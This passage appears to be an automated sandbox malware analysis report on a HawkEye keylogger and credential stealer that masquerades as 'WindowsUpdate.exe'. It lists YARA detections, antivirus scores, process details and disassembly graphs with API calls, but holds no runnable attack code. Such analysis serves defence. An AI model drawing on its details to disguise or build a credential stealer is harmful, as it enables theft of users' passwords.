                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BrowserPasswordDump_Tool, Description: Yara detected BrowserPasswordDump Tool by SecurityXploded, Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 88%, ReversingLabs
                                                                                                                  Reputation:low

                                                                                                                  General

                                                                                                                  Target ID:14
                                                                                                                  Start time:03:36:07
                                                                                                                  Start date:22/03/2022
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Windows Update.exe"
                                                                                                                  Imagebase:0xac0000
                                                                                                                  File size:1167872 bytes
                                                                                                                  MD5 hash:30747BB37997B54D37BAE65AE590B7E8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000E.00000002.359909884.0000000003801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BrowserPasswordDump_Tool, Description: Yara detected BrowserPasswordDump Tool by SecurityXploded, Source: 0000000E.00000000.330022226.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: 0000000E.00000000.329408523.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000000.329408523.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000E.00000000.329408523.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BrowserPasswordDump_Tool, Description: Yara detected BrowserPasswordDump Tool by SecurityXploded, Source: 0000000E.00000000.329408523.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: 0000000E.00000002.356895445.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.356895445.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000E.00000002.356895445.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BrowserPasswordDump_Tool, Description: Yara detected BrowserPasswordDump Tool by SecurityXploded, Source: 0000000E.00000002.356895445.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: 0000000E.00000003.351328752.0000000007544000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: 0000000E.00000000.331051101.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000000.331051101.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000E.00000000.331051101.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BrowserPasswordDump_Tool, Description: Yara detected BrowserPasswordDump Tool by SecurityXploded, Source: 0000000E.00000000.331051101.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_EmailPasswordDump_Tool, Description: Yara detected EmailPasswordDump Tool by SecurityXploded, Source: 0000000E.00000000.330464397.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000000.330464397.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000E.00000000.330464397.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_BrowserPasswordDump_Tool, Description: Yara detected BrowserPasswordDump Tool by SecurityXploded, Source: 0000000E.00000000.330464397.0000000000AC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  Reputation:low

                                                                                                                  General

                                                                                                                  Target ID:15
                                                                                                                  Start time:03:36:17
                                                                                                                  Start date:22/03/2022
                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:dw20.exe -x -s 2676
                                                                                                                  Imagebase:0x10000000
                                                                                                                  File size:33936 bytes
                                                                                                                  MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:1.1%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:19
                                                                                                                    Total number of Limit Nodes:1
                                                                                                                    execution_graph 49865 5b11162 49868 5b11197 GetFileType 49865->49868 49867 5b111c4 49868->49867 49869 5b11222 49872 5b11257 WriteFile 49869->49872 49871 5b11289 49872->49871 49861 5b10356 49862 5b1037c GetTextExtentPoint32W 49861->49862 49864 5b103a9 49862->49864 49873 5b10aa6 49874 5b10b06 49873->49874 49875 5b10adb PostMessageW 49873->49875 49874->49875 49876 5b10af0 49875->49876 49877 5b11306 49880 5b1132f CopyFileW 49877->49880 49879 5b11356 49880->49879 49881 5b1104a 49883 5b11082 CreateFileW 49881->49883 49884 5b110d1 49883->49884

                                                                                                                    Executed Functions

                                                                                                                    Function 03371E53 Relevance: 1.5, Instructions: 1488COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 157 3371e53-3371ea6 161 3371ed6-3371f40 157->161 162 3371ea8-3371ed5 157->162 171 3371f54-3371f8e 161->171 172 3371f42-3371f53 161->172 162->161 177 3371f94-33720e3 171->177 172->171 185 33720e5-3372117 177->185 186 3372118-33721ac 177->186 185->186 197 33721e1-3372492 186->197 198 33721ae-33721e0 186->198 221 337252e-3372745 197->221 222 3372498-337252d 197->222 198->197 252 3372896-3372945 221->252 253 337274b-3372772 221->253 222->221 274 337294b-33729d9 252->274 275 3372b68-3372bae 252->275 256 3372774-33727cf 253->256 257 33727d0-3372895 253->257 256->257 257->252 292 33729db-3372a45 274->292 293 3372a4a-3372a8f 274->293 280 3372bd2-3372c3f 275->280 281 3372bb0-3372bd1 275->281 296 3372c47-3372c8d 280->296 297 3372c41-3372c42 280->297 281->280 356 3372b67 292->356 301 3372a91-3372afb 293->301 302 3372afd-3372b66 293->302 306 3372c93-3372cda 296->306 307 3372fb9-3372fe1 296->307 299 337340a-3373450 297->299 310 3373456-337348b 299->310 311 3373555 299->311 301->356 302->356 317 3372f91-3372fb3 306->317 320 3372fe7-337302c 307->320 321 3373265-337328d 307->321 334 3373551-3373553 310->334 335 3373491-33734c7 310->335 315 3373556-337359c 311->315 332 3373974 315->332 333 33735a2-33735ee 315->333 317->307 322 3372cdf-3372cee 317->322 338 3373264 320->338 339 3373032-3373079 320->339 336 3373293-33732d8 321->336 337 3373409 321->337 325 3372cf5-3372d37 322->325 326 3372cf0 322->326 363 3372d3d-3372d44 325->363 364 3372f79-3372f83 325->364 326->325 340 3373975-33739bb 332->340 378 33735f4-3373804 333->378 379 3373970-3373972 333->379 334->315 375 3373529-337354b 335->375 357 33732de-3373320 336->357 358 3373408 336->358 337->299 338->321 360 337323c-337325e 339->360 352 3373b55-3373b9b 340->352 353 33739c1-3373a54 340->353 380 3373b9d-3373baa 352->380 381 3373bab-3373bf1 352->381 420 3373b0b-3373b2d 353->420 356->275 383 33733e0-3373402 357->383 358->337 360->338 361 337307e-337308d 360->361 367 3373094-33730dc 361->367 368 337308f 361->368 369 3372d46 363->369 370 3372d4b-3372d76 363->370 372 3372f85 364->372 373 3372f8a-3372f90 364->373 405 3373224-337322e 367->405 406 33730e2-33730e9 367->406 368->367 369->370 391 3372d7d-3372d9b 370->391 392 3372d78 370->392 372->373 373->317 375->334 382 33734c9-33734d8 375->382 467 337380a-3373844 378->467 468 3373679-33736ea 378->468 379->340 380->381 400 3373c65-3373cc4 381->400 401 3373bf3-3373c64 381->401 384 33734df-337351b 382->384 385 33734da 382->385 383->358 387 3373325-3373334 383->387 417 3373522-3373528 384->417 418 337351d 384->418 385->384 393 3373336 387->393 394 337333b-337337d 387->394 414 3372da2-3372dde 391->414 415 3372d9d 391->415 392->391 393->394 426 337337f-33733c7 394->426 427 33733c8-33733d2 394->427 401->400 409 3373235-337323b 405->409 410 3373230 405->410 412 33730f0-3373223 406->412 413 33730eb 406->413 409->360 410->409 412->405 413->412 435 3372de4-3372e96 414->435 436 3372e9b-3372f4c 414->436 415->414 417->375 418->417 422 3373b33-3373b54 420->422 423 3373a59-3373a68 420->423 422->352 433 3373a6f-3373aac 423->433 434 3373a6a 423->434 426->427 429 33733d4 427->429 430 33733d9-33733df 427->430 429->430 430->383 447 3373af4-3373afd 433->447 448 3373aae-3373af3 433->448 434->433 492 3372f4d-3372f78 435->492 436->492 450 3373b04-3373b0a 447->450 451 3373aff 447->451 448->447 450->420 451->450 475 3373846-3373852 467->475 476 3373853-3373854 467->476 496 337376d-3373793 468->496 475->476 482 3373855 476->482 482->482 492->364 499 33736ef-337373a 496->499 500 3373799-33737ca 496->500 508 337373c-337376a 499->508 509 337376b-337376c 499->509 503 33737cc-33737d8 500->503 504 33737d9-33737da 500->504 503->504 508->509 509->496
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283164612.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_3370000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b28d4b8f489cacc3f0572ce46242b0d398de055156bec03faad13b43cc99187e
                                                                                                                    • Instruction ID: 3ac9c9f13bbbd1574b3476cda4286d8b5347754242dfd1a3bd7d89fba5912726
                                                                                                                    • Opcode Fuzzy Hash: b28d4b8f489cacc3f0572ce46242b0d398de055156bec03faad13b43cc99187e
                                                                                                                    • Instruction Fuzzy Hash: 85F2ED74E012298FCB65DF64C894BAEB7BABB49304F1095EAD40DA7294DB349EC1CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05B11013 Relevance: 1.6, APIs: 1, Instructions: 98fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 5b11013-5b110a2 4 5b110a4 0->4 5 5b110a7-5b110b3 0->5 4->5 6 5b110b5 5->6 7 5b110b8-5b110c1 5->7 6->7 8 5b110c3-5b110e7 CreateFileW 7->8 9 5b11112-5b11117 7->9 12 5b11119-5b1111e 8->12 13 5b110e9-5b1110f 8->13 9->8 12->13
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 05B110C9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283448526.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_5b10000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: d9f7c1c2da2c6316dcc54f6691871ea66d63a37089badec514aba6048ee06b21
                                                                                                                    • Instruction ID: d2cd1043b1b61098d66abd80c52e45a177a8b0e420b89b53519ce585d6bffacc
                                                                                                                    • Opcode Fuzzy Hash: d9f7c1c2da2c6316dcc54f6691871ea66d63a37089badec514aba6048ee06b21
                                                                                                                    • Instruction Fuzzy Hash: 47319AB1504380AFE722CB25CC45B62BFE8EF06214F08849EE9858B262D275A909CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05B11120 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 16 5b11120-5b1112c 17 5b11146-5b111ad 16->17 18 5b1112e-5b11144 16->18 22 5b111e2-5b111e7 17->22 23 5b111af-5b111c2 GetFileType 17->23 18->17 22->23 24 5b111c4-5b111e1 23->24 25 5b111e9-5b111ee 23->25 25->24
                                                                                                                    APIs
                                                                                                                    • GetFileType.KERNELBASE(?,00000E2C,0A553DB8,00000000,00000000,00000000,00000000), ref: 05B111B5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283448526.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_5b10000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3081899298-0
                                                                                                                    • Opcode ID: f60bc9256bb6d2c8b1d8f96c65df4239f0f349e48937e0046c3248118554515c
                                                                                                                    • Instruction ID: 8f8774c736beecd42328da614b22f3d5469ed99e53b79abb59bd33d724acb690
                                                                                                                    • Opcode Fuzzy Hash: f60bc9256bb6d2c8b1d8f96c65df4239f0f349e48937e0046c3248118554515c
                                                                                                                    • Instruction Fuzzy Hash: FD21D6B54097806FE712CB299C50BA2BFB8EF46720F1884DAED849B153D224A909CB71
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05B10310 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 29 5b10310-5b1037a 31 5b1037c 29->31 32 5b1037f-5b10388 29->32 31->32 33 5b1038a 32->33 34 5b1038d-5b10399 32->34 33->34 35 5b103d3-5b103d8 34->35 36 5b1039b-5b103a3 GetTextExtentPoint32W 34->36 35->36 37 5b103a9-5b103bb 36->37 39 5b103da-5b103df 37->39 40 5b103bd-5b103d0 37->40 39->40
                                                                                                                    APIs
                                                                                                                    • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 05B103A1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283448526.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_5b10000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExtentPoint32Text
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 223599850-0
                                                                                                                    • Opcode ID: 5e025148add7ca36450a84d987e4e4ffb3c4fbac5160d44ad0711130835046ad
                                                                                                                    • Instruction ID: 2f1d5b7e2fae5279d23019c87376c9a2b2bd6bab126fa556db1ee221f4dad4d9
                                                                                                                    • Opcode Fuzzy Hash: 5e025148add7ca36450a84d987e4e4ffb3c4fbac5160d44ad0711130835046ad
                                                                                                                    • Instruction Fuzzy Hash: 84217C715093C45FD722CB25DC59B62BFB4EF06220F0984DBEC85CF263D269A808CB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05B1104A Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 42 5b1104a-5b110a2 45 5b110a4 42->45 46 5b110a7-5b110b3 42->46 45->46 47 5b110b5 46->47 48 5b110b8-5b110c1 46->48 47->48 49 5b110c3-5b110cb CreateFileW 48->49 50 5b11112-5b11117 48->50 52 5b110d1-5b110e7 49->52 50->49 53 5b11119-5b1111e 52->53 54 5b110e9-5b1110f 52->54 53->54
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 05B110C9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283448526.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_5b10000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: 64e3acdcb1dc18ceb63c0b3af8767653fc28cbdf3fa24c7c8f679162ecbb3c75
                                                                                                                    • Instruction ID: f0ae4188ade96de6ab0f2055686da6f738bcb0db5af62563b829c7db84839b04
                                                                                                                    • Opcode Fuzzy Hash: 64e3acdcb1dc18ceb63c0b3af8767653fc28cbdf3fa24c7c8f679162ecbb3c75
                                                                                                                    • Instruction Fuzzy Hash: 0D219C71600640AFEB21CF69CC85B66FBE9FF04710F1484AEEE858B251D371E408CB65
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05B111F0 Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 57 5b111f0-5b11279 61 5b1127b-5b1129b WriteFile 57->61 62 5b112bd-5b112c2 57->62 65 5b112c4-5b112c9 61->65 66 5b1129d-5b112ba 61->66 62->61 65->66
                                                                                                                    APIs
                                                                                                                    • WriteFile.KERNELBASE(?,00000E2C,0A553DB8,00000000,00000000,00000000,00000000), ref: 05B11281
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283448526.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_5b10000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3934441357-0
                                                                                                                    • Opcode ID: 06899cc86b190576beee05ac673b519b05db618b9dec8158722832351cb427a1
                                                                                                                    • Instruction ID: f4f76ab1397b1440a0c1ea183ac05ab7f9cdd835d09d67afe01c2ce741c12994
                                                                                                                    • Opcode Fuzzy Hash: 06899cc86b190576beee05ac673b519b05db618b9dec8158722832351cb427a1
                                                                                                                    • Instruction Fuzzy Hash: DB2192714093806FDB228B65DC45F56BFB8EF06314F0884DBED849F153C265A409CB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05B112CB Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 69 5b112cb-5b1132d 71 5b11332-5b11338 69->71 72 5b1132f 69->72 73 5b1133a 71->73 74 5b1133d-5b11346 71->74 72->71 73->74 75 5b11389-5b1138e 74->75 76 5b11348-5b11368 CopyFileW 74->76 75->76 79 5b11390-5b11395 76->79 80 5b1136a-5b11386 76->80 79->80
                                                                                                                    APIs
                                                                                                                    • CopyFileW.KERNELBASE(?,?,?), ref: 05B1134E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283448526.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_5b10000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CopyFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1304948518-0
                                                                                                                    • Opcode ID: 86fd1f2dde4f4565d680fd887ba8bc02e147392b7b7e9876af7404080f558357
                                                                                                                    • Instruction ID: 70a0f779bde1ce90eccb599bef0025989a5817cbb777e759dd3dc31cda90ab7e
                                                                                                                    • Opcode Fuzzy Hash: 86fd1f2dde4f4565d680fd887ba8bc02e147392b7b7e9876af7404080f558357
                                                                                                                    • Instruction Fuzzy Hash: D12195715093806FD722CF29DC55B62BFE8EF16314F1880DAED85CB653D225E908CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05B11222 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 82 5b11222-5b11279 85 5b1127b-5b11283 WriteFile 82->85 86 5b112bd-5b112c2 82->86 87 5b11289-5b1129b 85->87 86->85 89 5b112c4-5b112c9 87->89 90 5b1129d-5b112ba 87->90 89->90
                                                                                                                    APIs
                                                                                                                    • WriteFile.KERNELBASE(?,00000E2C,0A553DB8,00000000,00000000,00000000,00000000), ref: 05B11281
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283448526.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_5b10000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3934441357-0
                                                                                                                    • Opcode ID: ff787919b84e228f50919e01012bb1e0fe3fa89923c758cc683e104e755ded5b
                                                                                                                    • Instruction ID: 582a04418ddd365fb09bbf6ab566a27598560542b149bad096c770b5abf86e66
                                                                                                                    • Opcode Fuzzy Hash: ff787919b84e228f50919e01012bb1e0fe3fa89923c758cc683e104e755ded5b
                                                                                                                    • Instruction Fuzzy Hash: 2E11BF71400644AFEB21CF59DC81FAAFBA8EF04720F1484AAEE459F251C675A409CBB5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05B1187F Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 93 5b1187f-5b118e1 95 5b118e3-5b118f6 PostMessageW 93->95 96 5b11917-5b1191c 93->96 97 5b118f8-5b11914 95->97 98 5b1191e-5b11923 95->98 96->95 98->97
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 05B118E9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283448526.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_5b10000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: 75a584545a3eb232d114a05f4b8963de626a7df209c7b31557ff6ee24ba91041
                                                                                                                    • Instruction ID: 6cbb9d94867a36eafa78d5c6a3a3fcc0e4ef1e49914e01ec4a68dc67c8eb46d6
                                                                                                                    • Opcode Fuzzy Hash: 75a584545a3eb232d114a05f4b8963de626a7df209c7b31557ff6ee24ba91041
                                                                                                                    • Instruction Fuzzy Hash: A111D072549380AFDB228F15DC45B62FFB4EF06324F0884DEED854B163C265A959CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05B11306 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 101 5b11306-5b1132d 102 5b11332-5b11338 101->102 103 5b1132f 101->103 104 5b1133a 102->104 105 5b1133d-5b11346 102->105 103->102 104->105 106 5b11389-5b1138e 105->106 107 5b11348-5b11350 CopyFileW 105->107 106->107 108 5b11356-5b11368 107->108 110 5b11390-5b11395 108->110 111 5b1136a-5b11386 108->111 110->111
                                                                                                                    APIs
                                                                                                                    • CopyFileW.KERNELBASE(?,?,?), ref: 05B1134E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283448526.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_5b10000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CopyFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1304948518-0
                                                                                                                    • Opcode ID: d76d1e8ff6de11ba76faf8fe8a79dae322416392ee5cb31383b83600e1963287
                                                                                                                    • Instruction ID: f63f367255d0436c225414d8a526293025778d0b3697e20e9df9298bdd606797
                                                                                                                    • Opcode Fuzzy Hash: d76d1e8ff6de11ba76faf8fe8a79dae322416392ee5cb31383b83600e1963287
                                                                                                                    • Instruction Fuzzy Hash: 4B115E71A04240AFDB60CF69E885B66FBE8EF04620F18C4EADE49CB645D675E408CB65
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05B11162 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 113 5b11162-5b111ad 116 5b111e2-5b111e7 113->116 117 5b111af-5b111c2 GetFileType 113->117 116->117 118 5b111c4-5b111e1 117->118 119 5b111e9-5b111ee 117->119 119->118
                                                                                                                    APIs
                                                                                                                    • GetFileType.KERNELBASE(?,00000E2C,0A553DB8,00000000,00000000,00000000,00000000), ref: 05B111B5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.283448526.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_5b10000_steg.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3081899298-0
                                                                                                                    • Opcode ID: 925d205bb9356b5c5d7e210c7ff2c566c012ff167b27e2972f9ef474fefbf3a7
                                                                                                                    • Instruction ID: f4b99e12c11bd8e081c550e5a8f993e139db47d734ec7d6d95711c1e05ebfd21
                                                                                                                    • Opcode Fuzzy Hash: 925d205bb9356b5c5d7e210c7ff2c566c012ff167b27e2972f9ef474fefbf3a7
                                                                                                                    • Instruction Fuzzy Hash: C501D671540644AFE721CB59DC85FA6FBA8EF04720F2480A7EE449B241D678A509CA75
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

